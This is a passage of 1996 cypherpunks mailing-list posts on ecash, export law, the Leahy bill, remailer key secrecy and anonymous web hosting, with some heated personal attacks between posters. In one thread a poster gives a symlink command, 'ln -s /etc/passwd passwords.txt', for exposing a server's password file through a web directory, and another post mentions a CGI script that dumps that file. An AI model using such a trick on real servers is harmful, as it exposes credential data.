argument against his closely held convictions, his habit of ad hominem
attacks with little or no information, and his general loonieness make any
ideas he may have easlly discardable as being from a certified crank.  (And
he does an even better job at it in person!)

I do find it quite humerous that he feels that I somehow have control over
those who think he is a twit.  It shows just how disconnected he is from
anything resembling reality.  (Maybe he should spend more time on
alt.conspiracy.  He might find a few people who will humor him.)  If I had
such unwavering control over then, more of them would post on the national list!

Well, I have better things to do than rant about Mr. Bell's more pavlovian
responses and you have better things to do than reading them...

Back to more productive things.
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: knapper@bga.com (Woodrow W. Baker)
Date: Wed, 13 Mar 1996 17:53:35 +0800
Subject: CD-reading for random keys
Message-ID: <4i5gtu$99i@news2.realtime.net>
MIME-Version: 1.0
Content-Type: text/plain


Doe anyone know where sample code exists to enable one to read the digital
stream from an audio CD?  If so, I'd appreciate some pointers to it via 
email.  It seems to me like an Audio Cd would make the perfect one-time
crypto system.  You merely start reading at a specific spot, tossing away
bytes using a reproducable random number generator, then permuting
those to form a XOR one time key of any length you want.  All that would be
required to decrypt it would be a CD, the starting point, and the 
encryption/decryption software.  The first step is to be able to read an
arbitray sequence of digital samples from an arbitrary spot on a CD.  I'm 
currently looking for software (perferably source) to enable me to do that.

Cheers
Woody


--
Woody Baker Postscript consultant/ hired software gun /flintknapper
knapper@bga.com        woody@knapper.cactus.org
"If you ain't bleedin' you ain't knappin'" -->go ahead, ask me!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an534774@anon.penet.fi
Date: Wed, 13 Mar 1996 15:29:14 +0800
To: cypherpunks@toad.com
Subject: Crypto Exposure
Message-ID: <9603130405.AA27432@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



A few questions concerning the access to crypto
software from foreigners living in the US: 

- Suppose that an ISP (or a University) provides an account to
a foreigner (i.e. the foreigner can access a few UNIX machines
that are property of the ISP). Suppose now that PGP (for
example) is installed on these machines, then the ISP expose
the foreigner to crypto software, right? Is the ISP (or
University) punishable by law?   

- Which version of PGP is the foreigner allowed to use in the
US? He would violate export restriction if he uses the US
version and he would violate the RSA copyrights if he uses
the internation version, right? 

- What if the foreigner actually write crypto code while in
the US? Does he (or the Uni/ISP) violate export restrictions each 
time he access the source code or execute his program if they are 
stored on a public (Uni/ISP) machine? 

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tj_lists@prado.com
Date: Wed, 13 Mar 1996 20:52:26 +0800
To: <cypherpunks@toad.com>
Subject: Re: steganographic trick
Message-ID: <199603131203.EAA16094@zoe.prado.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from Alan Horowitz <alanh@larry.infi.net> 03/09/96  7:13pm -0500


> Vladimir,
> 
> Imagine you're an FBI agent or something like that.  You've been assigned 
> to investigate some guy, to include sniffing out any data he may have 
> stored in encrypted format to keep private.
> 
> You de-crypt the data from some elaborate stego scheme, and find - a 
> recipe for chocolate cookies.
> 
> The federal agents I know, are clever enough to say to themselves: 
> "what's wrong with this picture?"

Really? I'm sure some of them are, but I remember reading in G. Gordon Liddy's
"Will" that  FBI Agents were assigned to check up on novelist Nelson Algren ("Man
With the Golden Arm") who was living with Simone de Beauvoir at the time. Seeing
both names on the mailbox of the residence, the agents filled in the surveillance
form with Subject: Nelson Algren, alias Simone de Beauvoir.  




cc: Alan Horowitz <alanh@larry.infi.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 13 Mar 1996 21:11:07 +0800
To: cypherpunks@toad.com
Subject: Ecash press release
Message-ID: <v02120d09ad6c705ea642@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Comments: Authenticated sender is <paul@digicash.com>
From: "Paul Dinnissen" <paul@digicash.com>
Organization: DigiCash bv
To: ecash@digicash.com
Date: Wed, 13 Mar 1996 11:24:54 +1
Subject: Ecash press release
Reply-to: paul@digicash.com
Priority: normal
Sender: owner-ecash@digicash.com
Precedence: bulk

Release date:                           Contact EUnet Amsterdam:
Wednesday, March 13, 1996               Mr. Graham Wilson
Amsterdam, The Netherlands              Tel: +31 20 623 3803
                                        Fax: +31 20 662 4657
Contact DigiCash Amsterdam:             email: media@EU.net
Mr. Paul Dinnissen                      http://www.eu.net/
Tel: +31 20 665 2611
Fax: +31 20 665 1126                    Contact Merita Bank Helsinki:
email: press@digicash.com               Mr. Timo Nikinmaa
http://www.digicash.com/                Tel: +358 0 1654 2471


            ===============================================
                 Europeans Can Now Make Cash Purchases
                    on the Information Superhighway
            ===============================================

              First European Electronic Cash System Opens
                     for Business on the Internet


Today EUnet, Europe's leading provider of Internet services, and
DigiCash, the leading innovator in electronic  payment technology,
have launched a system that lets consumers make and receive payments
over the Internet--using an electronic form of cash. The "ecash"
technology gives even very small payments of a few cents the level of
security once reserved exclusively for large-value wire transfers,
while providing users with the familiar irrefutability, privacy, and
person-to-person payment capability of paper money.

The system is first being launched in Finland, the country with one of
the highest number of Internet  connections per person in the world.
Merita, Finland's largest bank, already provides over 3,000,000
account holders with access to its Solo payment service. This now
allows users to visit a "virtual ATM" on the World Wide Web, and
withdraw money directly from their bank account into their ecash
"purse". With this money they can make electronic payments to each
other as well as to on-line merchants.

The merchants already accepting ecash on launch day range from popular
magazines and newspapers, to  those selling stock quotes and GSM
paging through email. Soon, while travelling anywhere in Europe, you
will be able to dial a local number and pay for your Internet access,
via EUnetTraveller, using ecash. Following a successful launch in
Finland, EUnet, working with major banks, intends to roll out the
service during 1996, in more of the 41 countries in which it operates.

"We are delighted to be the first Internet Service Provider in the
world to make the benefits of ecash fully available to Internet users"
says Wim Vink, EUnet's Managing Director. "We see the ecash system as
a major enabling technology that will make electronic commerce into an
effective new way of doing business. Its simplicity and security
features mean that users can make purchases electronically with
confidence, convenience and privacy."

"We are happy to contribute to the development of a variety of secure
payment systems on the Internet," says Matti Karvonen, First Vice
President of Merita Bank. "Electronic commerce is likely to increase
as users are able to choose a payment system that suits them best.
Merita has around 200,000 customers who already use terminals for
their daily banking. We believe that the number will increase further
with the introduction of ecash and Solo payments."

"This launch and EUnetTraveller are really exciting new uses of ecash.
As transaction costs drop, low-value payments will be catalytic to
growth in electronic commerce" says Dr. David Chaum, the inventor of
electronic cash and Managing Director of DigiCash. "This will let the
unique advantages of ecash shine through: protecting the interest of
society better than paper money, while helping people protect their
own interests and enjoy the privacy and freedom they are accustomed to
with cash."

                            *  *  *

          (DigiCash and ecash are registered trademarks
            and should always be referred to as such)


                           -- end --


                      DigiCash Background
                      -------------------

Since beginning operation in April 1990, DigiCash's mission
and primary activity has been to develop and license competitive
payment techniques that show the true capability of technology to
protect the interests of all participants. Dr. David Chaum, Managing
Director of DigiCash, received his Ph.D. in Computer Science from the
University of California at Berkeley, then taught at New York
University Graduate School of Business Administration and at the
University of California, and headed the Cryptography Group at CWI,
the Dutch nationally-funded centre for research in mathematics and
computer science, before taking his current position. He has published
over 45 original technical articles on cryptography and also founded
the International Association for Cryptologic Research.

                       EUnet Background
                       ----------------

EUnet is Europe's leading commercial Internet Service
Provider, offering the full range of Internet Services, serving over
100,000 customers and over 750,000 users in 41 countries. EUnet, which
manages its own dedicated network infrastructure, offers full local
support services in each country of operation. Outside Europe, EUnet
has developed an expanding network of national and regional service
providers, with the aim of continually extending the services it
offers to customers world-wide.

                    Merita Bank Background
                    ----------------------

Merita Bank Ltd was formed in June 1995 from the merger of the
largest commercial banks in Finland, Union Bank of Finland Ltd and
Kansaills-Osake-Pankki. In Finland, Merita provides a full range of
finance, payment and asset-management services for households,
companies and institutions. The retail bank serves some 3,000,000
personal customers and over 100,000 small and medium-sized businesses.
At the end of September 1995, the total consolidated assets of the
Merita Group stood at FIM 283 billion. Merita Bank's market share of
total Finnish markka lending was 43.5 per cent, and its market share
of total Finnish markka deposits was 43.3 per cent. The number of
employees was 16,870.

           Companies That Welcome Ecash in Finland
           ---------------------------------------

City Magazine -- City Magazine is the most popular magazine among
Finland's 18-35 year-olds. With interviews, fashion, the latest
trends, current affairs and local events, City's nationwide
circulation is 225,000. Over the last eighteen months, City Magazine's
online service, `Surf City', has grown to a consistent 30,000 hits per
month. Now, when placing a classified ad in either the paper or the
online magazine, customers will be welcome to pay with ecash

SOM -- SOM, the Finnish Securities and Derivatives Exchange and
Clearing House,  established in 1987, serves as a neutral integrated
securities and derivatives exchange and clearing house.
 SOM offers real-time financial market information on stocks, options
and futures via the Internet, with invoices payable in ecash. Somtel
for Windows -the application that offers real-time feed, as well as
simulation and position-analysis functions-, is already available via
leased line.
 "The use of money makes stock trading less complicated, with money
acting as a practical intermediary between the transactions." states
Asko Schrey, President of SOM. "However, since stock trades, as well
as the shares themselves, are electronic nowadays, this conventional
transmission of money has actually become a bottleneck and a threat to
the development of the financial world. Therefore, SOM actively
participates in projects to promote and improve the efficiency of
payment traffic. We believe that electronic money will offer
interesting new possibilities."

Yomi Media -- Yomi Media Ltd., a part of KSP Phone Companies Group,
offers solutions in the field of digital media, information networks
and multimedia. Yomi Media has opened a virtual shop which sells phone
accessories and other telecommunication-related products via the
Internet. And they are pleased to accept ecash. Yomi Media will
provide ecash transaction services for other companies in the near
future.

Finnish Keltainen Porssi -- Finland's third best-selling paper,
Keltainen Porssi now accepts ecash payments. "Keltainen Porssi's
business has two features that make ecash the perfect means of payment
to us" explains Ari Ahola, CEO of Infosto Group. "Firstly the large
number of transactions (some 500,000 weekly readers for the printed
media) and secondly the low cost of each transaction. The large number
of small transactions is most easily managed using DigiCash's ecash."
Ahola concluded
 "Keltainen Porssi features some 80,000 classified ads per week in two
printed issues. The advantages of Dynamic Database Publishing are very
attractive in our type of media: The ability to crosscheck and analyse
data, enter and browse the ads in real time are just a few of the new
features which will be introduced in our Internet edition." added
Ahola.

MTV3 Internet -- MTV3 Finland is a nationwide commercial TV channel
which, with 43% share of the audience, is by far the most popular TV
channel in Finland. Since the autumn the MTV3 Web service
(http://www.mtv3.fi/) has been developing a media that combines news
and entertainment with the possibility to include advertising. With
ecash it is now possible to do real-time shopping at the MTV3
Marketplace. MicroMedia -- MicroMedia is a private Finnish direct
marketing service house specialized in business-to-business marketing.
The Address File lists 300,000 Finnish decision makers at 135,000
offices.

                     How does ecash work?
                     --------------------

Using ecash is like using a virtual ATM (Automatic Teller
Machine). When connecting to it over the Internet, you must first
authenticate your ownership of the account, and then request the
amount of ecash you want to withdraw. But instead of putting paper
cash in your wallet, your software stores the digital cash it receives
on the hard disk of your PC.
  When you want to make a payment, you simply confirm the
amount and the payee (you can add a description of the items bought,
or services wanted, if it is helpful) and then your ecash software
transfers coins of the correct value from your PC direct to the payee.
Merchants, (ranging from casual participants in the global Internet
bazaar to mega-retailers), can deposit the digital coins they receive
into their ecash accounts.
  Behind the user interface, your computer actually creates
some 'serial' numbers for the electronic coins based on a random seed.
Then it hides them in special encryption envelopes, sends them to the
electronic bank for signature and, when they are returned, removes the
envelopes while retaining the bank's validating digital signature on
the 'serial' numbers. This way, when the bank (eventually) receives
the coins you spend, it cannot recognize them as coming from any
particular withdrawal because they were hidden from the bank by the
envelopes during the withdrawal process. Therefore the bank cannot
know when or where you used a shop, or what you bought.
  The number of each signed coin is unique, allowing the bank
to be sure that it never accepts the same coin twice. In case you wish
to identify the recipient of any of your payments, you may
subsequently decide to reveal the unique coin number and use your
ecash software to prove that you created it.

                       How safe is ecash?
                       ------------------

Security is fundamental to electronic cash. The cryptographic
coding that protects every 5 cent ecash payment is the same as that
routinely relied upon for authenticating requests to move huge sums
between banks and even for national security. But in principle ecash
goes beyond such communications security to achieve true multiparty
security: no one (buyer, seller, bank) can cheat anyone else, no
matter how they might modify their own software. Even if two parties
collude, they cannot cheat the third.
  Replacing paper and coins with ecash would make life much
harder for criminals. Because the payer's computer chooses the serial
numbers of the coins, he or she can later irrefutably identify
blackmarketeers, extortionists, and acceptors of bribes--were they to
accept ecash. Paper notes, briefcases full of which can be passed from
hand to hand without leaving any record, allow money laundering and
tax evasion today. With ecash, however, all the amounts each person
receives are known to their bank. Significant criminal activity could
thus be thwarted by completely replacing paper money; moreover, the
privacy of ecash would be essential to widespread acceptance of any
electronic payment system.

For more information on ecash please contact DigiCash.
info@digicash.com, http://www.digicash.com/, fax: +31 20 6651126








+-----------------------------------------------------+
            Join the new ecash mailing-list!

   Mail to ecash-request@digicash.com and type 'help'
    or 'subscribe' in the first line of your message
+-----------------------------------------------------+

// Paul Dinnissen, DigiCash bv, http://www.digicash.com/
// Experience is what you get, when you don't get what you want

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Wed, 13 Mar 1996 20:34:00 +0800
To: cypherpunks@toad.com
Subject: Re: How's that again?
Message-ID: <199603131156.MAA00319@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
> At 05:40 PM 3/12/96 -0500, Black Unicorn wrote:
> >Revise your statement to:
> >"doesn't want anyone who hasn't spent a few years in law school to pass
> >judgement on pending legislation and the effect of supreme court decision
> >thereon..."
> >and you'd be right on the money.
> 
> I'm not a lawyer, though I've played a politician on TV.  I'll grant you
> that lawyers and other trained legal professionals can do a far better
> job of finding and analyzing cases than amateurs like myself, though I suspect
> a month or two's experience with Lexis would be enough to let many
> of "the rest of us" outsearch the average lawyer of 50 years ago
> who had to rely on his or her wits alone.  But if the average intellegent
> person _can't_ evaluate a law and have a reasonable chance of figuring
> out what it says and what it means, there's something seriously wrong
> with the way new laws are written, as well as enforced.

This is especially true in the UK, since the magistrates (the panel of
"judges") in the bottom level of courts (the magistrate courts) consist
of entirely of "respectable" members of the community (eg. headmasters
of local schools etc.).  They are very rarely legal professionals.

> [* Is it true that the reason Election Day is on the _second_
> Tuesday of November is to guarantee it never falls on Guy Fawkes' Day?]

Ah, Guy Fawkes, the only man to enter parliament with honest intentions ...


Gary




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <alan.pugh@internetmci.com>
Date: Thu, 14 Mar 1996 11:09:05 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: WSJ on E-Notaries
Message-ID: <01I29JRULOJM9KQLVS@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --


THE WALL STREET JOURNAL. 
(c) 1996 Dow Jones & Company, Inc. 
------------- 
TUESDAY, MARCH 12, 1996 
 
Legal Beat: Will Notaries Still Reign Over Red Tape When Documents
Move Electronically? 

By Margaret A. Jacobs Staff Reporter of The Wall Street Journal 

When Jack Gillis recently refinanced his home mortgage, he was
dismayed by the number of documents that had to be signed by a notary
public.
 
"I never could figure out why I had to have half of them notarized,"
says Mr. Gillis, a Washington, D.C., public relations consultant.
"Who are notaries anyway?" he asks. "What purpose do they serve?"
 
To anyone who has endured the hassle of trying to find a notary in a
hurry, such questions probably have a familiar ring. And these days
they have an extra edge: The digital age notwithstanding, notaries
toil on -- improbably -- in a sea of paper. Their quaint ledger books
and embossed seals are meant to deter fraud, but are hardly a match
for the unscrupulous. And amid accumulating evidence of sloppy
practices, some government officials are suggesting that notaries may
be obsolete.
 
There is even a move afoot to push notaries into the 21st century: A
committee of the American Bar Association has recommended creating a
new legal subspecialty of "cybernotary." These attorneys would 
combine legal and computer expertise, and would verify the
authenticity of electronic documents produced in global business
transactions. Part of their job would be to assure that a document's
"digital signature," or unique computer code, is genuine. Though use
of digital signatures is limited today, most people familiar with the
technology predict it will be commonplace within a few years.
 
Charles Faerber of the National Association of Notaries in Canoga
Park, Calif., stoutly defends notaries as effective bulwarks against
fraud; without them, he adds, the courts would be awash in cases
challenging the authenticity of documents.
 
The notary's duties have changed little over the centuries. The first
notaries were the scribes of ancient Rome who wrote official
documents. Today, they exist all over the world, virtually wherever
there is paperwork. In the U.S., some 4.5 million notaries are
licensed by state governments to verify the identities of people who
sign documents, such as realestate deeds and court affidavits. Lawyers
make copious use of notaries.
 
To cut red tape, Congress in recent years has dropped notarization
requirements for some documents filed with the federal government,
including trademark applications and certain court papers. Instead,
signers can declare under penalty of perjury that their information
is "true and correct."
 
At least one federal judge has also expressed doubts about the need
for notaries. "It may be questioned whether notarization is actually
an improvement upon the mere signature," U.S. District Judge John F. 
Grady of Chicago wrote in a 1990 opinion concerning proper procedures
for serving a lawsuit.
 
To ensure that people who sign documents are who they say they are,
notaries are supposed to ask for identification if they don't
personally know the signer. Then they are required to sign the
document themselves, affixing their stamp or seal. They typically
charge a fee of $2 or less.
 
But almost anyone over 18 who pays the $25 or $30 license fee is
eligible to notarize documents. In some states notary seals are
available by mail order, without any required proof -- or
notarization, for that matter -- that the recipient is authorized to
use it.
 
The absence of oversight has led to lax practices, critics complain.
Janice Shields, director of the corporate accountability project at
the Center for the Study of Responsive Law in Washington, D.C., says
that when she sold her car and had the bill of sale notarized, "the
notary didn't have a clue who I was. I could have stolen the car, for
all the notary knew."
 
In a 1990 survey by New York's notary trade group, only one of 217
randomly selected notaries there properly dealt with a simple
affidavit. More than 82% failed to check identification, for example.
 
Four years ago, Florida officials threatened to do away with notaries
entirely if slipshod practices persisted. It tightened up on rules
that are often flouted, insisting that documents be signed in a
notary's presence, for example. The crackdown arose after notaries
had failed to detect a rash of fraudulent boat sales, among other
complaints.
 
Earlier this year, California began requiring notaries to take
signers' thumbprints before notarizing real estate deeds. Besides
trying to prevent fraud, the state acted to impress upon low-income
and elderly people the significance of signing away their homes, says
Mr. Faerber of the national notary association.
 
Mr. Faerber, whose 125,000-member group advocates entrance tests and
training to professionalize the field, says notaries can prevent the
ailing elderly from being coerced into changing their wills or making
large gifts. "Nursing homes and hospitals are notary battlegrounds,"
he says. "They're where lots of wrongdoing is attempted."
 
Yet for people in need of a notary, simply tracking one down in a
hurry can be a challenge. Few notaries advertise; usually they
perform their service as a sideline to another full-time job.
 
Dan Holly, who works on Capitol Hill, recalls searching in vain for a
notary several years ago while he was working as a newspaper
reporter. He later found out that the managing editor's secretary was
a notary. "I would never have known," he says.
 
Even some notaries find notarization a nuisance. In New York, where
notaries must renew their licenses every two years, real-estate
broker Jane Tjian has found herself in need of notarization just as
her own notary license had expired. "You count on another
broker-notary being around and they're not," she says. "Then you have
to scramble to find someone or run to the bank" to track one down.
 
But Mr. Faerber of the national association says it's too soon to
write his profession's obituary. If notaries were eliminated, he
says, "the courts would be flooded with challenges that signatures
were coerced or forged."
 
He adds: "It may seem minor, but looking someone in the eye does
impress upon people the importance of telling the truth."
 

* * END OF DOCUMENT * * 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Mar 1996 19:01:20 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <ad6a31fb00021004ea91@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 3/11/96, jim bell wrote:

>Welcome to prison, Tim.  Your optimism will serve you well, there.
>
>BTW, it is clear that you haven't yet read Mr. Junger's analysis of the
>bill.  Nobody except a government stooge could read that and not wonder why
>anybody would support that bill.  A complete re-write is called for.

A question, Jim: do you _ever_ just respond calmly to a post you disagree
with, or is everyone you disaagree a stooge, a cretin, an agent for the
Feds, or someone who should be disposed of with your "assassination
politics"?

Yes, I read Junger's analysis. A nice analysis. What does this have to do
with the points I was making? I'm a government stooge, to use your terms,
because of my points about hotel rooms?

(On second thought, don't answer. In fact, I hope you take this opportunity
to add me to your kill file, the computer version, not the Assassination
Poltics (tm) version.))

--TCM

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 14 Mar 1996 19:03:17 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Leahy bill nightmare scenario?
In-Reply-To: <m0twGya-000915C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960311221602.11349C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Mar 1996, jim bell wrote:

> At 12:01 PM 3/11/96 -0800, Timothy C. May wrote:

> >
> >If I lend my chain saw to my next-door neighbor without confirming his
> >identity, and he carves up his wife, am I liable? Not in these parts.
> 
> "Criminally", probably not.  Civilly, probably if the victim's family 
> has a good enough lawyer.

This is a load of hooey.  I don't know How Mr. Bell thinks the law works 
in the United States, but I do know it has so little basis in reality as 
to be laughable.

I'm sure Mr. Bell will ask me now to cite three cases which indicate that 
lending a chainsaw to someone without asking for ID is negligant.

> >(If I lend my chain saw to a ranting, foaming maniac, am I liable? Perhaps.)
> 
> Actually, then you're CRIMINALLY liable, as well.

I would laugh out loud if I didn't think some people were taking Mr. Bell 
seriously.

> >If I let someone use my telephone without confirming his identity, am I
> >liable for crimes committed with this phone?
> >This last example is, I submit,  a nearly perfect parallel to anonymous
> >remailers. And not because the telephone system is a "common carrier," but
> >because of scienter: I have no knowledge, and cannot be expected to have
> >knowledge, of crimes committed with my phone.
> 
> Actually, that's wrong.  The question will be asked, "Do you regularly 
> lend your phone to strangers who you can't even see, no questions asked, 
> without listening in to see that nothing untoward is being plotted?"  
> _THAT's_ a more apt analogy.

Medication time... medication time.

> >If I have visitors at my house, perhaps at a party, and I let a stranger go
> >ahead and make a call from the phone in a bedroom, for example, and he
> >plans a drug deal, can my house be automatically seized? Not that I have
> >ever heard about. 
> 
> If your phone was already tapped, and the delivery occurred in your 
> house, you'd better look for new accomodations.

Delivery is another matter, but the judge that affirms the seizure of a 
house on the basis of a single delivery to a guest in the residence will 
be politely asked to leave the bench.  Unless the guest has some 
ownership of the house....

But did we expect Mr. Bell to actually be correct at this point?

> >Now if I operate a pay phone and encourage dealers and pimps to use it,
> >then maybe the public nuisance, RICO, or "crack house" laws can be used to
> >shut it down. (The public nuisance laws are what I would look to to see
> >remailers shut down, which will just move them offshore, of course. Absent
> >laws about sending encrypted packets outside the country, nothing can be
> >done.)
> 
> Justa sec:  The Leahy bill makes "encryption furtherance of a felony" 
> illegal.  Sending encrypted packets out of the country, containing material 
> you don't know (because they're encrypted) sounds like a classic opportunity 
> to declare you in violation of some "conspiracy to violate the law" of some 
> OTHER country, which is probably considered a Federal felony.

Mr. Bell, I suggest you take a correspondence course.  Perhaps the one on 
T.V. with Sally Struthers.  I believe they offer "Legal Secretary" as an 
option.  You would about double your practical knowledge of the law in 
this fashion.

I STRONGLY suggest that readers afford Mr. Bell's writings and 
conclusions a healthy degree of skepticism.

> Jim Bell
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 14 Mar 1996 05:52:55 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Remailer passphrases
In-Reply-To: <199603121951.OAA02237@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960312140002.390D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Mar 1996, Perry E. Metzger wrote:

> 
> Signed Diffie-Hellman key exchanges have the property known as
> "Perfect Forward Secrecy". Even if the opponent gets your public keys


Just to clarify Perry's statement- Diffie-Helman key exchanges can 
provide Perfect forward secrecy if fresh parameters are used each time- 
protocols like the old version of SKIP, which do not use fresh paramaters 
each time, do not provide perfect forward secrecy.

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 14 Mar 1996 08:23:44 +0800
To: Bruce Zambini <jlasser@rwd.goucher.edu>
Subject: Re: anonymous web pages (Was: SurfWatch)
In-Reply-To: <Pine.SUN.3.91.960312003232.4898A-100000@rwd.goucher.edu>
Message-ID: <Pine.LNX.3.91.960312152602.197B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Mar 1996, Bruce Zambini wrote:

> On Sun, 10 Mar 1996, Mark M. wrote:
> 
> > On Sat, 9 Mar 1996, Dan Cross wrote:
> >  
> > > This is an interesting idea, though I think a really really insecure one.
> > > What's keeping someone from posting ``trojan web pages'' and then waiting
> > > for the pages to be soaked up by servers?  Something that says ``click
> > > <here> to see the /etc/passwd file for this site!'' which runs some funky
> > > CGI thing to cat /etc/passwd or, ``Enter your credit card number to buy
> > > super wiz-bang gadget!'' or the like is a really scary, but very real,
> > > possibility if great care is not taken in setting this kind of thing up.
> > > News servers, on the other hand, don't suffer from this problem because
> > > the data which they contain is much more passive in nature (at least, while
> > > in the spool..) than HTML.
> > 
> > The obvious fix would just be to disallow the use of CGI scripts in anonymous
> > web pages.  In order for a file to be designated a CGI script, the must
> > be explicitly specified as such in the httpd configuration.  The web is
> > every bit as passive as Usenet.  The only difference is you can't make a
> > program that will execute on the NNTP server everytime it is retrieved (which
> > would be the Usenet equivalent of CGI).
> 
> Doesn't solve the problem completely, or even the individual example 
> given above.
> 
> >From your public html directory, try 'ln -s /etc/passwd passwords.txt'.
> 
> Then add a link to your homepage.... 

In order to add a symbolic link on a file system, you have to have shell
access to that system.  The whole point of this anonymous web pages thread
is that web pages could be distributed among different servers which could
store the pages on the filesystem and make access available through the
web.  An attacker could not put a link to the password file simply through
anonymous web pages.  Besides, password file should be shadowed anyway, and
httpd should never be run as root.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUXe8bZc+sv5siulAQHu8gP9FAy5ylQULMIUxRWB36Ab/33CdpTexa+5
cv0ezgxAkD06Ui6Epfn4Vj1qmNl9YFs4klHUmGT3dloxiJE7/jHmgLzvb/ka7NUT
5IxXBIsHbD+UOrUkn4g4iHjjAS6PJpMEElvtpN2EAZP8lTyjrTmo+D/8lLEvbL+D
5df/zqRYd6E=
=JekR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Thu, 14 Mar 1996 05:53:56 +0800
To: perry@piermont.com
Subject: Re: Remailer passphrases
In-Reply-To: <199603121951.OAA02237@jekyll.piermont.com>
Message-ID: <199603122332.PAA04146@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: perry@piermont.com]
[cc: cypherpunks@toad.com]
[Subject: Re: Remailer passphrases ]
[In-reply-to: Your message of Tue, 12 Mar 96 14:51:47 EST.]
             <199603121951.OAA02237@jekyll.piermont.com> 

"Perry E. Metzger" <perry@piermont.com> enscribed:
>Bill Frantz writes:
>> One of the reasons classical (government) crypto users change keys
>> frequently is to minimize the amount of data compromised by a broken key. 
>> We keep hearing about NSA decrypting 20 year old cyphertext and showing
>> more of the workings of the atomic spy rings operating in the 40s and 50s. 
>> If an opponent can rubber hose the key, her job is easy.  If she has to
>> perform cryptoanalysis, it is much harder.  Remailers should regularly
>> change their keys to avoid compromising previously recorded traffic.  (They
>> can have a long lived key for signing their traffic keys.)

>Signed Diffie-Hellman key exchanges have the property known as
>"Perfect Forward Secrecy". Even if the opponent gets your public keys
>it still will not decrypt any traffic for him at all -- it just lets
>him pretend to be you. Thats one reason why protocols like Photuris
>and Oakley use the technique.

True, but when the problem at hand is sending mail to a remailer, the
technique is of little or no value, since there is no initial exchange,
right? So this is a misleading argument. At least it is related to
cryptography and The Cypherpunk Agenda(tm)!

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMUX9UIHskC9sh/+lAQGItwP+IfITBi+LUAcV9O1w6071zvmNaDQNC5nG
OVe34+h5kKDyBnb2bLuVX5zEtuS56tiE0mgEaD5nevoRLijW1qqCRAsxi9/pfKcp
